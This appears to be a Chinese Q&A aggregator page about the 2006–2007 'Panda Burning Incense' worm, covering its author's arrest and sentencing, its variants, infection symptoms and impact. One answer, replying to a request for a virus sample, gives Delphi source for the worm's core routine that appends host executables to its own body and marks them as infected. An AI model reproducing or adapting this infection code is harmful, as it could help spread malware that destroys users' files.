熊猫烧香病毒样本(熊猫烧香技术含量高吗高在哪里)
本文目录
- 熊猫烧香技术含量高吗高在哪里
- 电脑病毒《熊猫烧香》的作者是谁
- 熊猫烧香的变种病毒
- 求“熊猫烧香”病毒样本
- “熊猫烧香”病毒是怎么回事求他的详细资料
- 熊猫烧香电脑病毒有什么特征,病毒制作者现在在哪
- 熊猫烧香病毒到底厉害在哪里
- 熊猫烧香事件的始末.!
熊猫烧香技术含量高吗高在哪里
2006-2007年,“熊猫烧香”可谓是轰动一时。时隔多年,当我们回过头再次来看该事件,“熊猫烧香”的破坏力远大于其技术含量,尤其是对网络信息安全产生深远的影响,毕竟它是第一个让普通用户对木马病毒有所认识和感知的。现在从技术角度来看,熊猫烧香病毒技术水平一般,但病毒作者在当时运用的各类技术手法还是值得安全人参考和借鉴的。首先其可以感染exe文件,也可以将以.gho结尾的文件删除;其次是将源病毒感染到web文件,使网页也成为它传播的介质;然后在传播层面,病毒作者使用众多传播途径;最后是具备一定的对抗杀软能力。
电脑病毒《熊猫烧香》的作者是谁
熊猫烧香电脑病毒案在湖北告破 抓获8名疑犯
2007年02月12日18:06 国际在线
新华社武汉2月12日电(记者方政军)湖北省公安厅12日宣布,根据统一部署,湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下,一举侦破了制作传播“熊猫烧香”病毒案,抓获李俊(男,25岁,武汉新洲区人)、雷磊(男,25岁,武汉新洲区人)等8名犯罪嫌疑人。
这是我国破获的国内首例制作计算机病毒的大案。
据介绍,2006年底,我国互联网上大规模爆发“熊猫烧香”病毒及其变种,该病毒通过多种方式进行传播,并将感染的所有程序文件改成熊猫举着三根香的模样,同时该病毒还具有盗取用户游戏账号、QQ账号等功能。
该病毒传播速度快,危害范围广,截至案发为止,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。《瑞星2006安全报告》将其列为十大病毒之首,在《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。
今年1月中旬,湖北省网监部门根据公安部公共信息网络安全监察局的部署,对“熊猫烧香”病毒的制作者开展调查。经查,熊猫烧香病毒的制作者为湖北省武汉市李俊,据李俊交代,其于2006年10月16日编写了“熊猫烧香”病毒并在网上广泛传播,并且还以自己出售和由他人代卖的方式,在网络上将该病毒销售给120余人,非法获利10万余元。
经病毒购买者进一步传播,导致该病毒的各种变种在网上大面积传播,对互联网用户计算机安全造成了严重破坏。李俊还于2003年编写了“武汉男生”病毒、2005年编写了“武汉男生2005”病毒及“QQ尾巴”病毒。另外,本案另有几个重要犯罪嫌疑人雷磊(男,25岁,武汉新洲区人)、王磊(男,22岁,山东威海人)、叶培新(男,21岁,浙江温州人)、张顺(男,23岁,浙江丽水人)、王哲(男,24岁,湖北仙桃人)通过改写、传播“熊猫烧香”等病毒,构建“僵尸网络”,通过盗窃各种游戏和QQ账号等方式非法牟利。
目前,李俊、雷磊等8名犯罪嫌疑人已被刑事拘留。
。
熊猫烧香的变种病毒
金猪报喜病毒实际就是熊猫烧香的新变种,春节将至,然而广大网络用户仍没有彻底摆脱“熊猫烧香”的阴霾。伴随着大量“熊猫烧香”变种的出现,对用户的危害一浪高过一浪。1月29日,来自金山毒霸反病毒中心最新消息:“熊猫烧香”化身“金猪”,危害指数再度升级,被感染的电脑中不但“熊猫”成群,而且“金猪”满圈。但象征财富的金猪仍然让用户无法摆脱“系统被破坏,大量应用软件无法应用”的噩梦。病毒描述:“武汉男生”,俗称“熊猫烧香”, 2006年12月又化身为“金猪报喜” ,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成可爱金猪的模样。2007年1月30日,江民科技反病毒中心监测到,肆虐互联网的“熊猫烧香”又出新变种。此次变种把“熊猫烧香”图案变成“金猪报喜”。江民反病毒专家提醒用户,春节临近,谨防春节期间病毒借人们互致祝福之际大面积爆发。专家介绍,“熊猫烧香”2006年11月中旬被首次发现,短短两个月时间,新老变种已达700多种,据江民反病毒预警中心监测到的数据显示,“熊猫烧香”病毒2006年12月一举闯入病毒排名前20名,2007年1月份更是有望进入前10名。疫情最严重的地区分别为:广东、山东、江苏、北京和辽宁。针对该病毒,江民杀毒软件KV系列已紧急升级,用户升级到最新病毒库即可有效防范该病毒于系统之外。江民“熊猫烧香”专杀工具已同步更新,未安装杀毒软件的用户可以登陆江民网站下载杀毒。此外,针对“熊猫烧香”变种频繁的特征,江民杀毒软件KV2007主动防御规则库可彻底防范“熊猫烧香”及其变种,用户可以登陆江民反病毒论坛下载使用。此外学生寒假开始,上网人群短期内集中上升,病毒的传播速度也空前加快,所以用户在进行上网的过程中要更加警惕病毒的入侵。据了解,前几天在网络上出现了“熊猫烧香”作者声称不再有变种出现,而“金猪”的出现再次粉碎了人们的美梦,再次将人们拉回到熊猫烧香的梦魇之中。专家称,按照当时“熊猫烧香”破坏程度,威胁将延伸至春节。专家提醒大家,遇到“金猪”不要心慌,用熊猫烧香专杀工具就可以完全对付这小金猪小金猪啦!熊猫烧香变身“金猪报喜”再作乱“熊猫烧香”余毒未尽,新变种接踵而来。据悉,熊猫烧香已改头换面变成新病毒“金猪报喜”。日前,江民、瑞星、金山等反病毒公司已经陆续截获大量“金猪报喜”病毒的报告,而这一病毒甚至可以清除用户机器里原有的“熊猫烧香”病毒,并自动取而代之。由于“熊猫烧香”病毒作者不断更新变种程序,众多杀毒软件无法跟随病毒的发展速度。而近日出现的“金猪报喜”病毒图表,同样是可爱的小动物,但危害却在与“熊猫烧香”一样感染EXE文件外,还能感染RAR跟ZIP等格式文件。据悉当时2008年几家反病毒厂商尚未推出针对“金猪报喜”的专杀工具。由于春节临近,更多新 病毒可能集中出现,因此反病毒专家提醒用户要加强警惕,及时升级 杀毒软件,不要随便点击莫名来历文件。最虔诚的病毒--熊猫烧香对于这个在06年给人们带来黑色记忆的病毒,其成因只因为作者为了炫耀自己而产生,其借助U盘的传播方式也引领新的反病毒课题,但这一切都没有其LOGO的熊猫给人的印象深刻,熊猫拿着三根香虔诚的祈祷什么?这给很多人以遐想。所以最虔诚的病毒只能颁给举着香在祈祷的熊猫。2007年9月24日,“熊猫烧香”案一审宣判,主犯李俊被判刑4年。庭审中,李俊的辩护律师王万雄出示了一份某网络公司发给李俊的邀请函,请他担任公司的技术总监。据悉,案发后已有不下10家网络大公司跟李俊联系,欲以100万年薪邀请其加入(见9月25日《长江商报》)。熊猫烧香传播性极高,中病毒者会在短时间内传染局域网内其他用户。
求“熊猫烧香”病毒样本
给你个其中的核心感染部分procedurecopy(ganran:string);varneicunliu,neicunliu2:tmemorystream;//内存流wenjianliu,wenjianliu2:longint;//文件流beginwenjianliu:=$12345678;//定义感染标记neicunliu:=tmemorystream.Create;//创建内存流neicunliu.LoadFromFile(paramstr(0));//将自身导入文件流neicunliu2:=tmemorystream.Create;//创建内存流neicunliu2.LoadFromFile(ganran);//导入目标文件neicunliu2.Seek(-4,sofromend);//定位到最后4个字节(8位neicunliu2.Read(wenjianliu2,4);//读取这4个字节ifwenjianliu2=wenjianliuthen//如果有标记则beginneicunliu.Free;//释放文件流neicunliu2.Free;//释放文件流endelsebeginneicunliu2.Seek(0,sofrombeginning);//定位到内存流的头部neicunliu.Seek(0,sofromend);//定位到内存流的尾部neicunliu.CopyFrom(neicunliu2,neicunliu2.Size);//写入内存流neicunliu.Seek(0,sofromend);//定位到内存流的尾部neicunliu.Write(wenjianliu,4);//写入感染标记neicunliu.SaveToFile(ganran);//保存文件neicunliu.Free;//释放文件流neicunliu2.Free;//释放文件流end;end;
“熊猫烧香”病毒是怎么回事求他的详细资料
熊猫烧香是一种经过多次变种的蠕虫病毒变种,2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写,2007年1月初肆虐网络,它主要透过下载的档案传染。 病毒名称:熊猫烧香 ,Worm.WhBoy.(金山称),Worm.Nimaya. (瑞星称) 病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”,国外称“熊猫烧香” 危险级别:★★★★★ 病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。 影响系统:Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista 发现时间:2006年10月16日 来源地:中国武汉东湖高新技术开发区关山 该病毒作者是李俊,武汉新洲区人,25岁。据他的家人以及朋友介绍,他在初中时英语和数学成绩都很不错,但还是没能考上高中,中专在娲石职业技术学校就读,学习的是水泥工艺专业,毕业后曾上过网络技术职业培训班,他朋友讲他是“自学成才,他的大部分电脑技术都是看书自学的”。2004年李俊到北京、广州的网络安全公司求职,但都因学历低的原因遭拒,于是他开始抱着报复社会以及赚钱的目的编写病毒了。他曾在2003年编写了病毒“武汉男生”,2005年他还编写了病毒QQ尾巴,并对“武汉男生”版本更新成为“武汉男生2005”。 此次传播的“熊猫烧香”病毒,作者李俊是先将此病毒在网络中卖给了120余人,每套产品要价500~1000元人民币,每日可以收入8000元左右,最多时一天能赚1万余元人民币,作者李俊因此直接非法获利10万余元。然后由这120余人对此病毒进行改写处理并传播出去的,这120余人的传播造成100多万台计算机感染此病毒,他们将盗取来的网友网络游戏以及QQ帐号进行出售牟利,并使用被病毒感染沦陷的机器组成“僵尸网络”为一些网站带来流量。 2007年2月12日湖北省公安厅12日宣布,根据统一部署,湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下,一举侦破了制作传播“熊猫烧香”病毒案,抓获病毒作者李俊。这是中国警方破获的首例计算机病毒大案。其他重要犯罪嫌疑人:雷磊(男,25岁,武汉新洲区人)、王磊(男,22岁,山东威海人)、叶培新(男,21岁,浙江温州人)、张顺(男,23岁,浙江丽水人)、王哲(男,24岁,湖北仙桃人)通过改写、传播“熊猫烧香”等病毒,构建“僵尸网络”,通过盗窃各种游戏账号等方式非法牟利。 这是中国近些年来,发生比较严重的一次蠕虫病毒发作。影响较多公司,造成较大的损失。且对于一些疏于防范的用户来说,该病毒导致较为严重的损失。由于此病毒可以盗取用户名与密码,因此,带有明显的牟利目的。所以,作者才有可能将此病毒当作商品出售,与一般的病毒制作者只是自娱自乐、或显示威力、或炫耀技术有很大的不同。另,制作者李俊在被捕后,在公安的监视下,又在编写解毒软件。 2007年9月24日,湖北省仙桃市人民法院一审以破坏计算机信息系统罪判处李俊有期徒刑四年、王磊有期徒刑二年六个月、张顺有期徒刑二年、雷磊有期徒刑一年,并判决李俊、王磊、张顺的违法所得予以追缴
熊猫烧香电脑病毒有什么特征,病毒制作者现在在哪
一、电脑病毒熊猫烧香的中毒特征:
1、中有该电脑病毒的电脑会自动强制更改桌面图标,图标统一被更改为熊猫烧香的图案,因而该病毒取名为“熊猫烧香”病毒。
2、中有该电脑病毒的电脑会频繁出现蓝屏、自动重启、甚至会由于系统文件被破坏而无法正常开机的现象。
二、轰动全国的“熊猫烧香”病毒制造者李俊涉嫌破坏计算机信息系统罪,被湖北省仙桃市检察院批准逮捕。2007年2月12日,这例由公安部统一部署督办的大案告破,包括李俊在内的8名嫌犯被全部抓获并刑事拘留。
扩展资料
“熊猫烧香”病毒的影响:
自病毒发布两个多月以来,感染“熊猫烧香”病毒的个人用户已经高达几百万,受害企业用户更是达到上千家,多数企业业务因此停顿,直接和间接损失无法估量。
根据《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》显示,2006年被截获的新病毒共有23万之众,几乎等于以往所有病毒数量的总和,而“熊猫烧香”则被“加冕”为“毒王”。
新病毒中90%以上带有明显的利益特征,有窃取个人资料、各种账号密码等行为,极大地威胁着网络用户的信息安全。
参考资料来源:百度百科-熊猫烧香
参考资料来源:人民网-“熊猫烧香”病毒制造者李俊被批捕
参考资料来源:人民网-从“熊猫烧香”元凶落网看网络安全
熊猫烧香病毒到底厉害在哪里
其实是一种蠕虫病毒的变种,而且是经过多次变种而来的。尼姆亚变种W(Worm.Nimaya.w),由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
熊猫烧香事件的始末.!
“熊猫烧香”事件始末及其背后的网络黑势力2006与2007年岁交替之际,一名为“熊猫烧香”的计算机病毒在互联网上掀起轩然大波。从去年12月首次出现至今,短短一个多月,病毒已迅速在全国蔓延,受害用户至少上百万,计算机反病毒公司的热线电话关于该病毒的咨询和求助一直不断,互联网上到处是受害者无奈的求助、怨恨、咒骂,电脑里到处是熊猫烧香的图标,重要文件被破坏,局域网彻底瘫痪,病毒造成的损失无法估量。 在网络工程师小李的映象中,已经两年没见过爆发范围如此巨大的计算机病毒了。在2003年“冲击波”、2004年的“震荡波”过后,计算机病毒主要是木马病毒为主,而木马病毒主要是有针对性的小范围感染,再加上木马病毒的隐藏特征,中毒电脑表面上没有任何迹象,所以互联网表面上一直风平浪静。怎么也没想到这次病毒来的这么猛,李冰想起来仍然心有余悸。那天他正在用QQ聊天,突然系统一个程序报错,于是他重启了一下电脑,结果重新登陆后发现电脑中所有的可执行文件都变成了“熊猫烧香”的图案。他赶紧开始杀毒,可是电脑中安装的一杀毒软件怎么也打不开了,于是他下载了另一款专杀工具,总算把大部分熊猫烧香图案清除了。第二天上班后,更可怕的事情出现了,办公室里的惊呼声一个接着一个,打开电脑准备工作的同事们陆续发现他们的电脑也感染了“熊猫烧香”,很快整个局域网陷入瘫痪,工作无法开展,原本准备紧张工作的人们难得闲了下来,小李他们开始投入了紧张的杀毒中,当天深夜12点网络才恢复了正常。 病毒作者的动机是什么? 在国内最先发布“熊猫烧香”病毒紧急警报的江民公司,记者见到了与“熊猫烧香”连续战斗了一个多月的反病毒专家何公道。何公道介绍,目前“熊猫烧香”仍然每天都有新变种出现,如果把之前的新老变种都算起来,这个病毒现在已有600多个变种。病毒作者如此频繁地制造变种,动机到底是什么呢
更多文章:
联想小新pro13尺寸(联想小新air 13 pro是多少寸的)
2023年10月28日 11:45
3000笔记本电脑推荐知乎(万能的知乎,求推荐一款3000到4000左右的笔记本)
2024年11月6日 18:30
惠普531打印机托架无法移动(您好 我连接上打印机后,打印时始终显示墨盒托架无法移动)
2024年7月21日 10:42
笔记本电池信息怎么查(笔记本电池容量怎么看 查看笔记本电池容量的方法)
2024年10月27日 02:45
电脑怎么恢复出厂设置win11(win11如何恢复出厂设置)
2024年7月18日 15:11
联想x100e笔记本装什么系统(联想 ThinkPad X100e 怎样重装win7系统)
2024年8月14日 03:10
thinkpadx201接口图解(thinkpad x201i右边中间的地方的像电话接口的口是干什么的)
2023年8月12日 02:00
神舟十六号三位宇航员信息(2021.6.17三名航天员的名字分别是)
2024年7月30日 14:35
surfacebook显卡(如何评价Surface Book所使用的GeForce 940M显卡)
2024年5月30日 20:42
thinkpad图片(求thinkpad壁纸,如图或者把我电脑上的找出来!)
2024年9月12日 00:25
联想扬天t4900v装win7(联想杨天T4900v安装WIN7用32为还是64位的)
2024年9月3日 16:45